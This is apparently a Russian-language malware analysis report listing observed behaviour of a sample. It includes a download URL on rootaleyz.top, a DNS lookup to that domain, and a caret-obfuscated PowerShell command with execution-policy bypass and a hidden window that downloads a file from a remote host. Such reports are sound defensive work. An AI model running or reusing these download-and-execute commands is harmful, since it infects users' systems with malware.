Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^w^Ers^hel^l^.exe^ ^-^E^xEcutioNPOLIcY b^Y^p^AS^s^ -^NoPr^oFilE^ ^-^Wi^ndOWS^t^YLe^ H^I^dd^E^n (n^E^w^-Ob^Je^c^T^ ^Sy^s^Tem.N^eT.W^EbcLiEn^T).dOW^nl^O^a^d^Fi^Le('http://r...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /C "P^O^w^Ers^hel^l^.exe^ ^-^E^xEcutioNPOLIcY b^Y^p^AS^s^ -^NoPr^oFilE^ ^-^Wi^ndOWS^t^YLe^ H^I^dd^E^n (n^E^w^-Ob^Je^c^T^ ^Sy^s^Tem.N^eT.W^EbcLiEn^T).dOW^nl^O^a^d^Fi^Le('http://r...' (со скрытым окном)